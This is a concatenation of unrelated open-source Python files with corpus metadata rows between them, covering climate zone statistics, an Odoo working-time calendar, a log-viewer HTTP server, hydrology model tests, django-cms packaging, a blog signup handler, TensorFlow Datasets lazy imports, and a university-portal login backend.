print("Using random seed: {}".format(seed))
numpy.random.seed(seed)
### Create output directories
if not os.path.exists(output_directory):
os.makedirs(output_directory)
for period in periods:
print("----------------------\nProcessing period {}\n".format(period))
period_dir = os.path.join(output_directory, period)
for variable in variables:
sample_dir = os.path.join(period_dir, "{}_samples".format(variable))
if not os.path.exists(sample_dir):
os.makedirs(sample_dir)
with StatsWriters(period_dir, variables) as writer:
for source in sources:
zones = source.seedzone_set.annotate(area_meters=Area("polygon")).all().order_by("zone_id")
with ZoneConfig(source.name) as config, ElevationDataset() as elevation_ds, ClimateDatasets(
period=period, variables=variables
) as climate:
for zone in Bar(
"Processing {} zones".format(source.name), max=source.seedzone_set.count(),
).iter(zones):
# calculate area of zone polygon in acres
poly_acres = round(zone.area_meters.sq_m * 0.000247105, 1)
zone_xmin, zone_ymin, zone_xmax, zone_ymax = zone.polygon.extent
zone_ctr_x = round(((zone_xmax - zone_xmin) / 2) + zone_xmin, 5)
zone_ctr_y = round(((zone_ymax - zone_ymin) / 2) + zone_ymin, 5)
region = get_regions_for_zone(zone)
elevation_ds.load_region(region.name)
climate.load_region(region.name)
window, coords = elevation_ds.get_read_window(zone.polygon.extent)
transform = coords.affine
elevation = elevation_ds.data[window]
# calculate pixel area based on UTM centered on window
pixel_area = round(
calculate_pixel_area(transform, elevation.shape[1], elevation.shape[0]) * 0.000247105,
1,
)
zone_mask = rasterize(
(json.loads(zone.polygon.geojson),),
out_shape=elevation.shape,
transform=transform,
fill=1, # mask is True OUTSIDE the zone
default_value=0,
dtype=numpy.dtype("uint8"),
).astype("bool")
# count rasterized pixels
raster_pixels = (zone_mask == 0).sum()
nodata_mask = elevation == elevation_ds.nodata_value
mask = nodata_mask | zone_mask
# extract all data not masked out as nodata or outside zone
# convert to feet
elevation = (elevation[~mask] / 0.3048).round().astype("int")
# if there are no pixels in the mask, skip this zone
if elevation.size == 0:
continue
min_elevation = math.floor(numpy.nanmin(elevation))
max_elevation = math.ceil(numpy.nanmax(elevation))
bands = list(config.get_elevation_bands(zone, min_elevation, max_elevation))
bands = generate_missing_bands(bands, min_elevation, max_elevation)
if not bands:
# min / max elevation outside defined bands
raise ValueError(
"Elevation range {} - {} ft outside defined bands\n".format(
min_elevation, max_elevation
)
)
### Extract data for each variable within each band
for variable, ds in climate.items():
# extract data with same shape as elevation above
data = ds.data[window][~mask]
# count the non-masked data pixels
# variables may be masked even if elevation is valid
zone_unit_pixels = data[data != ds.nodata_value].size
for band in bands:
low, high = band[:2]
band_mask = (elevation >= low) & (elevation <= high)
if not numpy.any(band_mask):
continue
# extract actual elevation range within the mask as integer feet
band_elevation = elevation[band_mask]
band_range = [
math.floor(numpy.nanmin(band_elevation)),
math.ceil(numpy.nanmax(band_elevation)),
]
# extract data within elevation range
band_data = data[band_mask]
# then apply variable's nodata mask
band_data = band_data[band_data != ds.nodata_value]
if not band_data.size:
continue
writer.write_row(
variable,
zone.zone_uid,
band,
band_range,
band_data,
period=period,
zone_set=zone.source,
species=zone.species.upper() if zone.species != "generic" else zone.species,
zone_unit=zone.zone_id,
zone_unit_poly_acres=poly_acres,
zone_unit_raster_pixels=raster_pixels,
zone_unit_raster_acres=raster_pixels * pixel_area,
zone_unit_pixels=zone_unit_pixels,
zone_unit_acres=zone_unit_pixels * pixel_area,
zone_unit_low=min_elevation,
zone_unit_high=max_elevation,
zone_pixels=band_data.size,
zone_acres=band_data.size * pixel_area,
zone_unit_ctr_x=zone_ctr_x,
zone_unit_ctr_y=zone_ctr_y,
zone_unit_xmin=round(zone_xmin, 5),
zone_unit_ymin=round(zone_ymin, 5),
zone_unit_xmax=round(zone_xmax, 5),
zone_unit_ymax=round(zone_ymax, 5),
)
self._write_sample(
period_dir, variable, zone.zone_uid, zone.zone_id, band_data, *band_range
)
| bsd-3-clause | -5,571,044,848,462,398,000 | 43.639847 | 127 | 0.465711 | false | 5.203662 | false | false | false |
marcok/odoo_modules | hr_employee_time_clock/models/resource_calendar.py | 1 | 16701 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2016 - now Bytebrand Outsourcing AG (<http://www.bytebrand.net>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime as dtime
from datetime import datetime, timedelta
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
import logging
import pytz
_logger = logging.getLogger(__name__)
class ResourceCalendar(models.Model):
_inherit = 'resource.calendar'
@api.multi
def get_working_intervals_of_day(self, start_dt=None,
end_dt=None, leaves=None,
compute_leaves=False, resource_id=None,
default_interval=None):
work_limits = []
if start_dt is None and end_dt is not None:
start_dt = end_dt.replace(hour=0, minute=0, second=0)
elif start_dt is None:
start_dt = datetime.now().replace(hour=0, minute=0, second=0)
else:
work_limits.append((start_dt.replace(
hour=0, minute=0, second=0), start_dt))
if end_dt is None:
end_dt = start_dt.replace(hour=23, minute=59, second=59)
else:
work_limits.append((end_dt, end_dt.replace(
hour=23, minute=59, second=59)))
assert start_dt.date() == end_dt.date(), \
'get_working_intervals_of_day is restricted to one day'
intervals = []
work_dt = start_dt.replace(hour=0, minute=0, second=0)
# no calendar: try to use the default_interval, then return directly
if not self.ids:
working_interval = []
if default_interval:
working_interval = (
start_dt.replace(hour=default_interval[0],
minute=0, second=0),
start_dt.replace(hour=default_interval[1],
minute=0, second=0))
# intervals = self._interval_remove_leaves(working_interval, work_limits)
date_from = start_dt.replace(hour=default_interval[0],
minute=0, second=0).replace(tzinfo=pytz.UTC)
date_to = start_dt.replace(hour=default_interval[1],
minute=0, second=0).replace(tzinfo=pytz.UTC)
intervals += self._leave_intervals(date_from, date_to)
return intervals
#working_intervals = []
for calendar_working_day in self.get_attendances_for_weekdays(
[start_dt.weekday()], start_dt,
end_dt):
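            # Convert the float hour encoding (e.g. 8.5 -> 08:30) into explicit
            # hour/minute pairs; the branches below handle the different
            # fractional-part lengths produced by str() of the float.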
str_time_from_dict = str(calendar_working_day.hour_from).split('.')
hour_from = int(str_time_from_dict[0])
if int(str_time_from_dict[1]) < 10:
minutes_from = int(60 * int(str_time_from_dict[1]) / 10)
elif int(str_time_from_dict[1]) > 100:
m = str_time_from_dict[1][:2] + '.' + str_time_from_dict[1][2:]
m = float(m)
minutes_from = round(60 * m / 100)
else:
minutes_from = int(60 * int(str_time_from_dict[1]) / 100)
str_time_to_dict = str(calendar_working_day.hour_to).split('.')
hour_to = int(str_time_to_dict[0])
if int(str_time_to_dict[1]) < 10:
minutes_to = int(60 * int(str_time_to_dict[1]) / 10)
elif int(str_time_to_dict[1]) > 100:
m = str_time_to_dict[1][:2] + '.' + str_time_to_dict[1][2:]
m = float(m)
minutes_to = round(60 * m / 100)
else:
minutes_to = int(60 * int(str_time_to_dict[1]) / 100)
working_interval = (
work_dt.replace(hour=hour_from).replace(minute=minutes_from),
work_dt.replace(hour=hour_to).replace(minute=minutes_to)
)
# working_intervals += self._interval_remove_leaves(working_interval, work_limits)
intervals.append(working_interval)
date_from = work_dt.replace(hour=hour_from).replace(minute=minutes_from).replace(tzinfo=pytz.UTC)
date_to = work_dt.replace(hour=hour_to).replace(minute=minutes_to).replace(tzinfo=pytz.UTC)
# working_intervals += self._leave_intervals(date_from, date_to)
# find leave intervals
if leaves is None and compute_leaves:
leaves = self._get_leave_intervals(resource_id=resource_id)
# filter according to leaves
# for interval in working_intervals:
# if not leaves:
# leaves = []
# work_intervals = self._interval_remove_leaves(interval, leaves)
# intervals += work_intervals
return intervals
@api.multi
def get_working_hours_of_date(self, start_dt=None,
end_dt=None, leaves=None,
compute_leaves=None, resource_id=None,
default_interval=None):
""" Get the working hours of the day based on calendar. This method uses
get_working_intervals_of_day to have the work intervals of the day. It
then calculates the number of hours contained in those intervals. """
res = dtime.timedelta()
intervals = self.get_working_intervals_of_day(
start_dt, end_dt, leaves,
compute_leaves, resource_id,
default_interval)
for interval in intervals:
res += interval[1] - interval[0]
return seconds(res) / 3600.0
@api.multi
def get_bonus_hours_of_date(self, start_dt=None,
end_dt=None, leaves=None,
compute_leaves=False, resource_id=None,
default_interval=None):
""" Get the working hours of the day based on calendar. This method uses
get_working_intervals_of_day to have the work intervals of the day. It
then calculates the number of hours contained in those intervals. """
res = dtime.timedelta()
intervals = self.get_working_intervals_of_day(
start_dt, end_dt, leaves,
compute_leaves, resource_id,
default_interval)
for interval in intervals:
res += interval[1] - interval[0]
return seconds(res) / 3600.0
@api.multi
def get_attendances_for_weekdays(self, weekdays, start_dt, end_dt):
""" Given a list of weekdays, return matching
resource.calendar.attendance"""
res = []
for att in self.attendance_ids:
if int(att.dayofweek) in weekdays:
if not att.date_from or not att.date_to:
res.append(att)
else:
date_from = datetime.strptime(att.date_from, '%Y-%m-%d')
date_to = datetime.strptime(att.date_to, '%Y-%m-%d')
if date_from <= start_dt <= date_to:
res.append(att)
return res
use_overtime = fields.Boolean(string="Use Overtime Setting")
min_overtime_count = fields.Integer(string="Minimum overtime days",
default=0,
required=True)
count = fields.Integer(string="Percent Count",
default=0,
required=True)
overtime_attendance_ids = fields.One2many(
'resource.calendar.attendance.overtime',
'overtime_calendar_id',
string='Overtime')
two_days_shift = fields.Boolean(string='Shift between two days',
default=True,
                                    help='Use for a night shift that spans '
                                         'two days.')
@api.constrains('min_overtime_count')
def _check_min_overtime_count(self):
"""Ensure that field min_overtime_count is >= 0"""
if self.min_overtime_count < 0:
raise ValidationError("Minimum overtime days must be positive.")
@api.constrains('two_days_shift')
def _check_two_days_shift(self):
if self.two_days_shift is False:
for attendance_id in self.overtime_attendance_ids:
if attendance_id.hour_to <= attendance_id.hour_from:
raise ValidationError("Overtime to must be greater than "
"overtime from when two days "
"shift is not using.")
@api.multi
def _get_leave_intervals(self, resource_id=None,
start_datetime=None, end_datetime=None):
self.ensure_one()
if resource_id:
domain = ['|',
('resource_id', '=', resource_id),
('resource_id', '=', False)]
else:
domain = [('resource_id', '=', False)]
if start_datetime:
domain += [('date_to', '>', fields.Datetime.to_string(
start_datetime + timedelta(days=-1)))]
if end_datetime:
domain += [('date_from', '<',
fields.Datetime.to_string(start_datetime +
timedelta(days=1)))]
leaves = self.env['resource.calendar.leaves'].search(
domain + [('calendar_id', '=', self.id)])
filtered_leaves = self.env['resource.calendar.leaves']
for leave in leaves:
if not leave.tz:
if self.env.context.get('tz'):
leave.tz = self.env.context.get('tz')
else:
leave.tz = 'UTC'
if start_datetime:
leave_date_to = to_tz(
fields.Datetime.from_string(leave.date_to), leave.tz)
if not leave_date_to >= start_datetime:
continue
if end_datetime:
leave_date_from = to_tz(
fields.Datetime.from_string(leave.date_from), leave.tz)
if not leave_date_from <= end_datetime:
continue
filtered_leaves += leave
return [self._interval_new(
to_tz(fields.Datetime.from_string(leave.date_from), leave.tz),
to_tz(fields.Datetime.from_string(leave.date_to), leave.tz),
{'leaves': leave}) for leave in filtered_leaves]
@api.multi
def initial_overtime(self):
contracts = self.env['hr.contract'].search(
[('resource_calendar_id', '=', self.id)])
employee_ids = [contract.employee_id.id for contract in contracts]
for employee in self.env['hr.employee'].browse(set(employee_ids)):
employee.initial_overtime()
class ResourceCalendarAttendanceOvertime(models.Model):
_name = "resource.calendar.attendance.overtime"
_order = 'dayofweek, hour_from'
_description = 'ResourceCalendarAttendanceOvertime'
name = fields.Char(required=True)
dayofweek = fields.Selection([('0', 'Monday'),
('1', 'Tuesday'),
('2', 'Wednesday'),
('3', 'Thursday'),
('4', 'Friday'),
('5', 'Saturday'),
('6', 'Sunday')
],
string='Day of Week',
required=True,
index=True,
default='0')
date_from = fields.Date(string='Starting Date')
date_to = fields.Date(string='End Date')
hour_from = fields.Float(string='Overtime from',
required=True,
index=True,
help="Start and End time of Overtime.")
hour_to = fields.Float(string='Overtime to',
required=True)
overtime_calendar_id = fields.Many2one("resource.calendar",
string="Resource's Calendar",
required=True,
ondelete='cascade')
def seconds(td):
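    """Total seconds in a timedelta (equivalent to timedelta.total_seconds())."""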
assert isinstance(td, dtime.timedelta)
return (td.microseconds + (
td.seconds + td.days * 24 * 3600) * 10 ** 6) / 10. ** 6
def to_tz(datetime, tz_name):
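    """Localize a naive datetime as UTC, convert it to tz_name and return it
    naive again. (Note: the first parameter shadows the datetime module.)"""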
tz = pytz.timezone(tz_name)
return pytz.UTC.localize(datetime.replace(tzinfo=None),
is_dst=False).astimezone(tz).replace(tzinfo=None)
class ResourceCalendarAttendance(models.Model):
_inherit = "resource.calendar.attendance"
@api.multi
def write(self, values):
if 'date_from' in values.keys() or 'date_to' in values.keys():
old_date_from = self.date_from
old_date_to = self.date_to
new_date_from = values.get('date_from') or self.date_from
new_date_to = values.get('date_to') or self.date_to
start_calc = None
if not old_date_from or not new_date_from:
start_calc = (datetime.now().date().replace(
month=1, day=1)).strftime("%Y-%m-%d")
end_calc = None
if not old_date_to or not new_date_to:
end_calc = (datetime.now().date().replace(
month=12, day=31)).strftime("%Y-%m-%d")
res = super(ResourceCalendarAttendance, self).write(values)
list_of_dates = filter(None, [new_date_from, new_date_to,
old_date_from, old_date_to,
end_calc, start_calc])
list_of_dates = [datetime.strptime(date, "%Y-%m-%d") for date in
list_of_dates]
date_end = max(list_of_dates)
date_start = min(list_of_dates)
self.change_working_time(date_start, date_end)
return res
else:
return super(ResourceCalendarAttendance, self).write(values)
@api.model
def create(self, values):
date_start = values.get('date_from') or (
datetime.now().date().replace(month=1, day=1)).strftime("%Y-%m-%d")
date_end = values.get('date_to') or (
datetime.now().date().replace(month=12, day=31)).strftime(
"%Y-%m-%d")
res = super(ResourceCalendarAttendance, self).create(values)
res.change_working_time(date_start, date_end)
return res
@api.multi
def unlink(self):
date_start = self.date_from or (
datetime.now().date().replace(month=1, day=1)).strftime("%Y-%m-%d")
date_end = self.date_to or (
datetime.now().date().replace(month=12, day=31)).strftime(
"%Y-%m-%d")
resource_calendar_id = self.calendar_id.id
res = super(ResourceCalendarAttendance, self).unlink()
self.change_working_time(date_start, date_end, resource_calendar_id)
return res
@api.multi
def change_working_time(self, date_start, date_end,
resource_calendar_id=False):
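        """Recalculate the attendance analytic lines of every running contract
        on this working time that fall between date_start and date_end."""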
_logger.info(date_start)
_logger.info(date_end)
analytic_pool = self.env['employee.attendance.analytic']
if not resource_calendar_id:
resource_calendar_id = self.calendar_id.id
contract_ids = self.env['hr.contract'].search(
[('state', '=', 'open'),
('resource_calendar_id', '=', resource_calendar_id)]).ids
lines = analytic_pool.search(
[('contract_id', 'in', contract_ids),
('attendance_date', '<=', date_end),
('attendance_date', '>=', date_start)])
_logger.info(len(lines))
for line in lines:
analytic_pool.recalculate_line(line.name)
| agpl-3.0 | -787,052,981,684,389,600 | 43.18254 | 109 | 0.528232 | false | 4.130843 | false | false | false |
mamiaokui/tracer | tools/LogServer/Server.py | 1 | 2827 | import time
import BaseHTTPServer
import re
from datetime import datetime
HOST_NAME = '10.33.43.6' # !!!REMEMBER TO CHANGE THIS!!!
PORT_NUMBER = 8080 # Maybe set this to 9000.
class Event:
time = "null"
pid = 0
delay = 5
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
#Process transactions.txt
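        # Expected record layout, inferred from the state machine below:
        #   status 0: "<name>-<pid>-<comm>" header line (pid extracted)
        #   status 1: "[YYYY-MM-DD HH:MM:SS.ffffff ...]" timestamp line
        #   status 2: "Transaction ... H:M:S[.f]" delay line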
transactions_list = []
status = 0
e = Event()
for line in open("transactions.txt"):
line = line.strip()
if (status == 0):
e.pid = re.split("(\S+)-(\d+)-(\S+)", line)[2]
status = 1
continue
if (status == 1):
e.time = datetime.strptime(line[1:26], "%Y-%m-%d %H:%M:%S.%f")
status = 2
continue
if (status == 2):
if (line[0:11] != "Transaction"):
continue
if "." in line[17:]:
e.delay = datetime.strptime(line[17:], "%H:%M:%S.%f")
else:
e.delay = datetime.strptime(line[17:], "%H:%M:%S")
transactions_list.append(e)
e = Event()
status = 0
epoch = datetime(1900, 1, 1, 0, 0, 0)
pid_list = ["Time", ]
timeline = []
timeline_list = []
sorted_transactions_list = sorted(transactions_list, key=lambda x: time.mktime(x.time.timetuple()))
for event in sorted_transactions_list:
if event.pid not in pid_list:
pid_list.append(event.pid)
for event in sorted_transactions_list:
timeline = [0]*(len(pid_list))
timeline[0] = str(event.time)
delta = event.delay - epoch
timeline[pid_list.index(event.pid)] = delta.total_seconds() * 1000.0
timeline_list.append(timeline)
for content in open("main.html"):
if (content.strip() == "HEAD"):
s.wfile.write(str(pid_list)+",")
elif (content.strip() == "BODY"):
s.wfile.write(str(timeline_list)[1:-1])
else:
s.wfile.write(content)
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
| gpl-2.0 | 9,211,730,896,767,646,000 | 33.47561 | 107 | 0.516095 | false | 3.784471 | false | false | false |
gwtsa/gwtsa | tests/test_project.py | 1 | 2884 | from pandas import read_csv
import pastas as ps
ps.set_log_level("ERROR")
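# Each test below builds on the previous one by calling it directly, so running
# a later test also exercises every setup step before it in the chain.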
def test_create_project():
pr = ps.Project(name="test")
return pr
def test_project_add_oseries():
pr = test_create_project()
obs = read_csv("tests/data/obs.csv", index_col=0, parse_dates=True,
squeeze=True)
pr.add_oseries(obs, name="heads", metadata={"x": 0.0, "y": 0})
return pr
def test_project_add_stresses():
pr = test_project_add_oseries()
prec = read_csv("tests/data/rain.csv", index_col=0, parse_dates=True,
squeeze=True)
evap = read_csv("tests/data/evap.csv", index_col=0, parse_dates=True,
squeeze=True)
pr.add_stress(prec, name="prec", kind="prec", metadata={"x": 10, "y": 10})
pr.add_stress(evap, name="evap", kind="evap",
metadata={"x": -10, "y": -10})
return pr
def test_project_add_model():
pr = test_project_add_stresses()
pr.add_models(model_name_prefix="my_", model_name_suffix="_model")
return pr
def test_project_add_recharge():
pr = test_project_add_model()
pr.add_recharge()
return pr
def test_project_solve_models():
pr = test_project_add_recharge()
pr.solve_models()
return pr
def test_project_get_parameters():
pr = test_project_solve_models()
return pr.get_parameters(["recharge_A", "noise_alpha"])
def test_project_get_statistics():
pr = test_project_solve_models()
return pr.get_statistics(["evp", "aic"])
def test_project_del_model():
pr = test_project_add_model()
pr.del_model("my_heads_model")
return pr
def test_project_del_oseries():
pr = test_project_add_oseries()
pr.del_oseries("heads")
return pr
def test_project_del_stress():
pr = test_project_add_stresses()
pr.del_stress("prec")
return pr
def test_project_get_distances():
pr = test_project_add_stresses()
return pr.get_distances()
def test_project_get_nearest_stresses():
pr = test_project_add_stresses()
pr.get_nearest_stresses(kind="prec", n=2)
def test_project_dump_to_file():
pr = test_project_solve_models()
pr.to_file("testproject.pas")
return
def test_project_load_from_file():
pr = ps.io.load("testproject.pas")
return pr
def test_project_get_oseries_metadata():
pr = test_project_add_oseries()
return pr.get_oseries_metadata(["heads"], ["x", "y"])
def test_project_get_oseries_settings():
pr = test_project_add_oseries()
return pr.get_oseries_settings(["heads"], ["tmin", "tmax", "freq"])
def test_project_get_metadata():
pr = test_project_add_stresses()
return pr.get_metadata()
def test_project_get_file_info():
pr = test_project_add_oseries()
return pr.get_file_info()
def test_project_update_model_series():
pr = test_project_solve_models()
pr.update_model_series()
return
| mit | -4,870,507,018,814,844,000 | 22.639344 | 78 | 0.635576 | false | 3.097744 | true | false | false |
DylannCordel/django-cms | setup.py | 2 | 1526 | from setuptools import setup, find_packages
import os
import cms
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries :: Application Frameworks',
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
]
setup(
author="Patrick Lauber",
author_email="[email protected]",
name='django-cms',
version=cms.__version__,
description='An Advanced Django CMS',
long_description=open(os.path.join(os.path.dirname(__file__), 'README.rst')).read(),
url='https://www.django-cms.org/',
license='BSD License',
platforms=['OS Independent'],
classifiers=CLASSIFIERS,
install_requires=[
'Django>=1.6,<1.8',
'django-classy-tags>=0.5',
'html5lib<0.9999',
'django-treebeard==3.0',
'django-sekizai>=0.7',
'djangocms-admin-style'
],
extras_require={
'south': ['south>=1.0.0'],
},
packages=find_packages(exclude=["project", "project.*"]),
include_package_data=True,
zip_safe=False,
test_suite='runtests.main',
)
| bsd-3-clause | 3,222,477,265,272,711,700 | 30.142857 | 88 | 0.619921 | false | 3.740196 | false | true | false |
ashutoshpurushottam/wishper-blog | handlers/signup.py | 1 | 2578 | from main import BaseHandler
from models.user import store_blog_user
from base.helpers import validate
from base.helpers import make_secure_val
import time
class SignupHandler(BaseHandler):
"""
    Handles form validation and checks whether the username and/or email
    address already exists. If the form is submitted with valid inputs, the
    user is added to the db and redirected to the welcome page.
"""
def get(self):
self.render("signup.html")
def post(self):
# obtain input values from the form
input_username = self.request.get('username')
input_password = self.request.get('password')
input_verify = self.request.get('verify')
input_email = self.request.get('email')
validate_response = validate(input_username,
input_password,
input_verify,
input_email)
        # if the validate_response dictionary is empty, the user input values are
        # valid (except that the username/email may already be taken, which still
        # needs to be checked)
if validate_response:
username_error = validate_response.get('username_error', "")
password_error = validate_response.get('password_error', "")
verify_error = validate_response.get('verify_error', "")
email_error = validate_response.get('email_error', "")
self.render("signup.html",
username_error=username_error,
password_error=password_error,
verify_error=verify_error,
email_error=email_error,
input_username=input_username,
input_email=input_email)
else:
store_user_response = store_blog_user(input_username,
input_password,
input_email)
if store_user_response:
self.render("signup.html",
store_user_error=store_user_response,
input_username=input_username,
input_email=input_email)
# user successfully stored in db
else:
user_cookie = make_secure_val(str(input_username))
self.response.headers.add_header(
"Set-Cookie", "user=%s; Path=/" %
user_cookie)
time.sleep(0.1)
self.redirect('/')
| apache-2.0 | 2,149,645,121,340,756,500 | 42.694915 | 87 | 0.537626 | false | 4.976834 | false | false | false |
tensorflow/datasets | tensorflow_datasets/core/lazy_imports_lib.py | 1 | 5332 | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Lazy imports for heavy dependencies."""
import functools
import importlib
from typing import TypeVar
from tensorflow_datasets.core.utils import py_utils as utils
_Fn = TypeVar("_Fn")
def _try_import(module_name):
"""Try importing a module, with an informative error message on failure."""
try:
mod = importlib.import_module(module_name)
return mod
except ImportError as e:
err_msg = ("Failed importing {name}. This likely means that the dataset "
"requires additional dependencies that have to be "
"manually installed (usually with `pip install {name}`). See "
"setup.py extras_require.").format(name=module_name)
utils.reraise(e, suffix=err_msg)
class LazyImporter(object):
"""Lazy importer for heavy dependencies.
Some datasets require heavy dependencies for data generation. To allow for
the default installation to remain lean, those heavy dependencies are
lazily imported here.
"""
@utils.classproperty
@classmethod
def apache_beam(cls):
return _try_import("apache_beam")
@utils.classproperty
@classmethod
def bs4(cls):
return _try_import("bs4")
@utils.classproperty
@classmethod
def crepe(cls):
return _try_import("crepe")
@utils.classproperty
@classmethod
def cv2(cls):
return _try_import("cv2")
@utils.classproperty
@classmethod
def gcld3(cls):
return _try_import("gcld3") # pylint: disable=unreachable
@utils.classproperty
@classmethod
def h5py(cls):
return _try_import("h5py")
@utils.classproperty
@classmethod
def langdetect(cls):
return _try_import("langdetect")
@utils.classproperty
@classmethod
def librosa(cls):
return _try_import("librosa")
@utils.classproperty
@classmethod
def lxml(cls):
return _try_import("lxml")
@utils.classproperty
@classmethod
def matplotlib(cls):
_try_import("matplotlib.pyplot")
return _try_import("matplotlib")
@utils.classproperty
@classmethod
def mwparserfromhell(cls):
return _try_import("mwparserfromhell")
@utils.classproperty
@classmethod
def networkx(cls):
return _try_import("networkx")
@utils.classproperty
@classmethod
def nltk(cls):
return _try_import("nltk")
@utils.classproperty
@classmethod
def pandas(cls):
return _try_import("pandas")
@utils.classproperty
@classmethod
def PIL_Image(cls): # pylint: disable=invalid-name
# TiffImagePlugin need to be activated explicitly on some systems
# https://github.com/python-pillow/Pillow/blob/5.4.x/src/PIL/Image.py#L407
_try_import("PIL.TiffImagePlugin")
return _try_import("PIL.Image")
@utils.classproperty
@classmethod
def PIL_ImageDraw(cls): # pylint: disable=invalid-name
return _try_import("PIL.ImageDraw")
@utils.classproperty
@classmethod
def pretty_midi(cls):
return _try_import("pretty_midi")
@utils.classproperty
@classmethod
def pycocotools(cls):
return _try_import("pycocotools.mask")
@utils.classproperty
@classmethod
def pydub(cls):
return _try_import("pydub")
@utils.classproperty
@classmethod
def scipy(cls):
_try_import("scipy.io")
_try_import("scipy.io.wavfile")
_try_import("scipy.ndimage")
return _try_import("scipy")
@utils.classproperty
@classmethod
def skimage(cls):
_try_import("skimage.color")
_try_import("skimage.filters")
try:
_try_import("skimage.external.tifffile")
except ImportError:
pass
return _try_import("skimage")
@utils.classproperty
@classmethod
def tifffile(cls):
return _try_import("tifffile")
@utils.classproperty
@classmethod
def tensorflow_data_validation(cls):
return _try_import("tensorflow_data_validation")
@utils.classproperty
@classmethod
def tensorflow_io(cls):
return _try_import("tensorflow_io")
@utils.classproperty
@classmethod
def tldextract(cls):
return _try_import("tldextract")
@utils.classproperty
@classmethod
def os(cls):
"""For testing purposes only."""
return _try_import("os")
@utils.classproperty
@classmethod
def test_foo(cls):
"""For testing purposes only."""
return _try_import("test_foo")
lazy_imports = LazyImporter # pylint: disable=invalid-name
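# Typical use (sketch): `lazy_imports.pandas.read_csv(path)` performs the heavy
# import only when the attribute is accessed; later accesses are served from
# sys.modules.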
def beam_ptransform_fn(fn: _Fn) -> _Fn:
"""Lazy version of `@beam.ptransform_fn`."""
lazy_decorated_fn = None
@functools.wraps(fn)
def decorated(*args, **kwargs):
nonlocal lazy_decorated_fn
# Actually decorate the function only the first time it is called
if lazy_decorated_fn is None:
lazy_decorated_fn = lazy_imports.apache_beam.ptransform_fn(fn)
return lazy_decorated_fn(*args, **kwargs)
return decorated
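# Hypothetical usage sketch: the wrapped function is only passed through the
# real beam.ptransform_fn (importing apache_beam) on its first call.
#
# @beam_ptransform_fn
# def _ExampleTransform(pcoll, multiplier):
#   beam = lazy_imports.apache_beam
#   return pcoll | beam.Map(lambda x: x * multiplier)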
| apache-2.0 | -587,575,874,370,292,600 | 23.685185 | 78 | 0.700863 | false | 3.659574 | false | false | false |
squarebracket/star | backends/myconcordia.py | 1 | 19029 | from registrator.models import StudentRecord
from user_stuff.models import StarUser, Student
from bs4 import BeautifulSoup, Tag
from cookielib import CookieJar
import urllib
import urllib2
import urlparse
from StringIO import StringIO
import gzip
import re
from uni_info.models import Semester, Section, Course
from registrator.models import StudentRecord, StudentRecordEntry
class MyConcordiaBackend(object):
def __init__(self):
pass
@staticmethod
def authenticate(username=None, password=None, session=None):
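        """Log into the MyConcordia portal with the given credentials; on
        success, get or create the matching local Student/StarUser, stash the
        live accessor in session['reg'] and return the user, else None."""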
reg = MyConcordiaAccessor()
if not reg.login(username, password):
return None
        # implicit else: login succeeded
student = reg.get_user_status()
if student:
try:
user = Student.objects.get(username=username)
except Student.DoesNotExist:
user = Student(username=username,
password='get from myconcordiaacc',
date_of_birth='1970-01-01')
user.save()
            stud, _created = StudentRecord.objects.get_or_create(  # returns (obj, created)
student=user,
_standing='Good'
)
stud_rec = reg.get_student_record()
stud_info = stud_rec.student_info
user.date_of_birth = stud_info['date_of_birth']
user.first_name = stud_info['first_name']
user.last_name = stud_info['last_name']
user.student_identifier = stud_info['id']
user.gender = stud_info['gender']
user.save()
else:
try:
user = StarUser.objects.get(username=username)
except StarUser.DoesNotExist:
user = StarUser(username=username, password='get from myconcordiaacc',
date_of_birth='1970-01-01')
user.save()
session['reg'] = reg
return user
@staticmethod
def get_user(user_id):
try:
return StarUser.objects.get(pk=user_id)
except StarUser.DoesNotExist:
return None
SEMESTER_MAPPER = {
'/2': Semester.FALL,
'/3': Semester.YEAR_LONG,
'/4': Semester.WINTER,
'/1': Semester.SUMMER_1
}
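# The '/N' keys above are the portal's session codes (assumed from the scraping
# code below); SEMESTER_REVERSE_MAPPER inverts only the fall/year-long/winter
# codes, so summer has no reverse entry.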
SEMESTER_REVERSE_MAPPER = {
Semester.FALL: '2',
Semester.YEAR_LONG: '3',
Semester.WINTER: '4'
}
class MyConcordiaAccessor():
LOGIN_URL = 'https://my.concordia.ca/psp/upprpr9/?cmd=login&languageCd=ENG'
STUDENT_RECORD_LINK_TEXT = 'Display the student record.'
